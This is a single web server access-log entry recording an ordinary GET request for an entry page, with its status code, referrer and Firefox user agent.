178.165.176.49 - - [09/Jan/2025:11:34:55 +0100] "GET /entry.php?id=11270&document=10346218 HTTP/1.1" 200 1974 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
